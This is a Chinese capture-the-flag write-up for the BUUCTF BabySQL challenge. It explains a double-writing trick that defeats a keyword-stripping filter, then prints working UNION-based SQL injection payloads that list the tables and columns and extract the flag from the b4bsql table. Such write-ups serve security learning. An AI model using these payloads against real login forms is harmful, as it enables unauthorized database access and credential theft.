BUUCTF: [极客大挑战 2019]BabySQL

BUUCTF: 极客大挑战 2019BabySQL

本文知识点:

sql注入中的双写绕过: 很多文章只讲了双写能绕过一些场景,但是没有说为什么,我认为可能是下面这种情况可以使用,有不对的地方还请多多指教!

什么情况下需要双写绕过呢?

假如你是一个开发者,你会怎样处理非法出入呢?

  1. 对我们认为危险的关键字进行监测,比如用户传递的参数含有select的时候,直接返回,不执行数据库的查询操作
  2. 将用户输入中的危险关键字替换为空!比如将select替换为空,对应的代码就是replace('select', '')

针对第二种情况,我们就可以使用双写绕过了!!!

比如:我们传递selselectect,经过代码的替换,最终变为了我们想要的select

题目描述

题目有两个输入框,一个输入用户名,一个输入密码。以及还有一个登录按钮,如下:

初步尝试

  • 我们输入1' or 1# 尝试用or的方式使得条件总是为真,同时使用#将后续的sql语句注释掉, 结果如下:

可以看到报错中含有#号,说明其至少没有被过滤,这种情况我们可以考虑or被过滤了

  • 使用^代替or测试,可以看到成功登录了
  • 继续测试其他sql语句,发现union、*、select、from、or、where都被过滤了,以下是其中一个测试的截图:(因为我们传递的union后面没有语句了,但是返回结果却没有报错,所以我猜测他被替换为空了)

思考如何绕过

前面知识点中提到,后端的代码可能是replace('select','')这种形式,针对这种形式,我们就可以采用双写绕过!

  • 首先查询数据库中有哪些表!我们输入下面的内容, 其中**-1是为了让第一个查询失败,以回显我们需要的信息**。
bash 复制代码
-1' ^ 1 uniounionn sselectelect 1,2,(seselectlect group_concat(table_name) frfromom infoorrmation_schema.tables whewherere table_schema=database())#&password=2

注意information中的or也需要双写!后端服务器进行替换后的内容就是

bash 复制代码
-1' ^ 1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())#&password=2

成功输出了数据库中的表名,结果如下:

  • 查询数据库表中的列名 ,因为*也被过滤了,不能直接查询所有内容。使用的语句如下:
bash 复制代码
username=-1%27+^+1%20uniounionn%20sselectelect%201,2,(seselectlect%20group_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whewherere%20table_schema=database() aandnd table_name='b4bsql')%23&password=2

成功回显表b4bsql的列名

  • 查询数据的各个字段内容,这里最终测试flag是保存在password之中的!

    使用的sql语句如下:

bash 复制代码
username=-1%27+^+1%20uniounionn%20sselectelect%201,2,(seselectlect%20group_concat(passwoorrd)%20frfromom%20b4bsql)%23&password=2

​ 反馈的结果如下:

相关推荐
kyriewen12 小时前
Anthropic 估值逼近万亿美元,Claude Sonnet 5 + Claude Science 一天两连发
前端·ai编程·claude
小徐_233313 小时前
Wot UI 2.2.0 发布:Button 新增 subtle,VideoPreview 预览体验继续增强
前端·微信小程序·uni-app
天蓝色的鱼鱼15 小时前
关于 CSS 你可能不知道的属性,但关键时刻很有用
前端·css
泯泷16 小时前
第 2 篇:设计第一套字节码:Opcode、Instruction 与 Constant Pool
前端·javascript·安全
妙码生花16 小时前
从 PHP 到 AI + Golang,程序员自救转型手记(十五):优化细节、网络请求封装
前端·后端·ai编程
泯泷16 小时前
第 1 篇:从 1 + 2 开始:亲手写出第一台 JSVM
前端·javascript·安全
团团崽_七分甜16 小时前
Spring Boot 核心知识点总结
前端
lichenyang45317 小时前
从一个按钮开始,理解 ASCF 框架到底在做什么
前端
古夕17 小时前
第三方 SSO 接入实践:redirect_uri 编码、回调一致性与跨项目联调
前端·vue.js